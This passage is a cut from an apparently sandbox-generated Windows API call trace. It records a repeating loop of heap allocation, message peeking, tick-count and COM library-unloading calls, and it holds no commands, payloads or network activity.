| out: hHeap=0x2620000) returned 1 [0066.553] GetTickCount () returned 0x1d2a9 [0066.554] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.554] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.554] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.554] GetTickCount () returned 0x1d2a9 [0066.554] GetTickCount () returned 0x1d2a9 [0066.554] CoFreeUnusedLibraries () [0066.554] GetTickCount () returned 0x1d2a9 [0066.554] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.554] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.554] GetTickCount () returned 0x1d2a9 [0066.554] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.554] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.554] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.554] GetTickCount () returned 0x1d2a9 [0066.554] GetTickCount () returned 0x1d2a9 [0066.554] CoFreeUnusedLibraries () [0066.554] GetTickCount () returned 0x1d2a9 [0066.554] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.554] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.554] GetTickCount () returned 0x1d2a9 [0066.554] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.554] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.555] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] CoFreeUnusedLibraries () [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.555] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.555] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.555] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] CoFreeUnusedLibraries () [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.555] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.555] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.555] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] CoFreeUnusedLibraries () [0066.555] GetTickCount () returned 0x1d2a9 [0066.555] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.556] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.556] GetTickCount () returned 0x1d2a9 [0066.556] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.556] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.556] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.556] GetTickCount () returned 0x1d2a9 [0066.556] GetTickCount () returned 0x1d2a9 [0066.556] CoFreeUnusedLibraries () [0066.556] GetTickCount () returned 0x1d2a9 [0066.556] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.556] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.556] GetTickCount () returned 0x1d2a9 [0066.556] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.556] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.556] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.556] GetTickCount () returned 0x1d2a9 [0066.556] GetTickCount () returned 0x1d2a9 [0066.556] CoFreeUnusedLibraries () [0066.556] GetTickCount () returned 0x1d2a9 [0066.556] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.556] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.556] GetTickCount () returned 0x1d2a9 [0066.557] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.557] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.557] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.557] GetTickCount () returned 0x1d2a9 [0066.557] GetTickCount () returned 0x1d2a9 [0066.557] CoFreeUnusedLibraries () [0066.557] GetTickCount () returned 0x1d2a9 [0066.557] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.557] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.557] GetTickCount () returned 0x1d2a9 [0066.557] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.557] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.557] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.557] GetTickCount () returned 0x1d2a9 [0066.557] GetTickCount () returned 0x1d2a9 [0066.557] CoFreeUnusedLibraries () [0066.557] GetTickCount () returned 0x1d2a9 [0066.557] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.557] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.557] GetTickCount () returned 0x1d2a9 [0066.558] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.558] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.558] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.558] GetTickCount () returned 0x1d2a9 [0066.558] GetTickCount () returned 0x1d2a9 [0066.558] CoFreeUnusedLibraries () [0066.558] GetTickCount () returned 0x1d2a9 [0066.558] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.558] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.558] GetTickCount () returned 0x1d2a9 [0066.558] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.558] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.558] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.558] GetTickCount () returned 0x1d2a9 [0066.558] GetTickCount () returned 0x1d2a9 [0066.558] CoFreeUnusedLibraries () [0066.558] GetTickCount () returned 0x1d2a9 [0066.558] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.558] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.558] GetTickCount () returned 0x1d2a9 [0066.559] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.559] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.559] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.559] GetTickCount () returned 0x1d2a9 [0066.559] GetTickCount () returned 0x1d2a9 [0066.559] CoFreeUnusedLibraries () [0066.559] GetTickCount () returned 0x1d2a9 [0066.559] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.559] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.559] GetTickCount () returned 0x1d2a9 [0066.559] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.559] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.559] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.559] GetTickCount () returned 0x1d2a9 [0066.559] GetTickCount () returned 0x1d2a9 [0066.559] CoFreeUnusedLibraries () [0066.559] GetTickCount () returned 0x1d2a9 [0066.559] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.559] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.559] GetTickCount () returned 0x1d2a9 [0066.559] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.559] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.559] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] CoFreeUnusedLibraries () [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.560] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.560] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.560] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] CoFreeUnusedLibraries () [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.560] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.560] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.560] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] CoFreeUnusedLibraries () [0066.560] GetTickCount () returned 0x1d2a9 [0066.560] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.560] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.560] GetTickCount () returned 0x1d2a9 [0066.561] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.561] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.561] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] CoFreeUnusedLibraries () [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.561] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.561] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.561] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] CoFreeUnusedLibraries () [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.561] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.561] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.561] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] CoFreeUnusedLibraries () [0066.561] GetTickCount () returned 0x1d2a9 [0066.561] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.561] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.561] GetTickCount () returned 0x1d2a9 [0066.562] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.562] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.562] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.562] GetTickCount () returned 0x1d2a9 [0066.562] GetTickCount () returned 0x1d2a9 [0066.562] CoFreeUnusedLibraries () [0066.562] GetTickCount () returned 0x1d2a9 [0066.562] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.562] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.562] GetTickCount () returned 0x1d2a9 [0066.562] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.562] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.562] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.562] GetTickCount () returned 0x1d2a9 [0066.562] GetTickCount () returned 0x1d2a9 [0066.562] CoFreeUnusedLibraries () [0066.562] GetTickCount () returned 0x1d2b9 [0066.562] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.562] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.562] GetTickCount () returned 0x1d2b9 [0066.563] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.563] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.563] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.563] GetTickCount () returned 0x1d2b9 [0066.563] GetTickCount () returned 0x1d2b9 [0066.563] CoFreeUnusedLibraries () [0066.563] GetTickCount () returned 0x1d2b9 [0066.563] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.563] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.563] GetTickCount () returned 0x1d2b9 [0066.563] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.563] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.563] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.563] GetTickCount () returned 0x1d2b9 [0066.563] CoFreeUnusedLibraries () [0066.563] GetTickCount () returned 0x1d2b9 [0066.563] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.563] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.563] GetTickCount () returned 0x1d2b9 [0066.563] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.563] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.563] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.563] CoFreeUnusedLibraries () [0066.563] GetTickCount () returned 0x1d2b9 [0066.563] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.563] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.563] GetTickCount () returned 0x1d2b9 [0066.563] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.563] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.564] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.564] CoFreeUnusedLibraries () [0066.564] GetTickCount () returned 0x1d2b9 [0066.564] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.564] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.564] GetTickCount () returned 0x1d2b9 [0066.564] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.564] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.564] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.564] CoFreeUnusedLibraries () [0066.564] GetTickCount () returned 0x1d2b9 [0066.564] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.564] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.564] GetTickCount () returned 0x1d2b9 [0066.564] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.564] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.564] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.564] CoFreeUnusedLibraries () [0066.564] GetTickCount () returned 0x1d2b9 [0066.564] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.564] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.564] GetTickCount () returned 0x1d2b9 [0066.564] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.564] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.564] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.564] CoFreeUnusedLibraries () [0066.564] GetTickCount () returned 0x1d2b9 [0066.564] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.564] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.564] GetTickCount () returned 0x1d2b9 [0066.564] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.564] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.564] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.564] CoFreeUnusedLibraries () [0066.564] GetTickCount () returned 0x1d2b9 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.565] GetTickCount () returned 0x1d2b9 [0066.565] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.565] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.565] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.565] CoFreeUnusedLibraries () [0066.565] GetTickCount () returned 0x1d2b9 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.565] GetTickCount () returned 0x1d2b9 [0066.565] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.565] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.565] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.565] CoFreeUnusedLibraries () [0066.565] GetTickCount () returned 0x1d2b9 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.565] GetTickCount () returned 0x1d2b9 [0066.565] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.565] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.565] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.565] CoFreeUnusedLibraries () [0066.565] GetTickCount () returned 0x1d2b9 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.565] GetTickCount () returned 0x1d2b9 [0066.565] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.565] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.565] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.565] CoFreeUnusedLibraries () [0066.565] GetTickCount () returned 0x1d2b9 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.565] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.565] GetTickCount () returned 0x1d2b9 [0066.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.566] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.566] CoFreeUnusedLibraries () [0066.566] GetTickCount () returned 0x1d2b9 [0066.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.566] GetTickCount () returned 0x1d2b9 [0066.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.566] RtlAllocateHeap 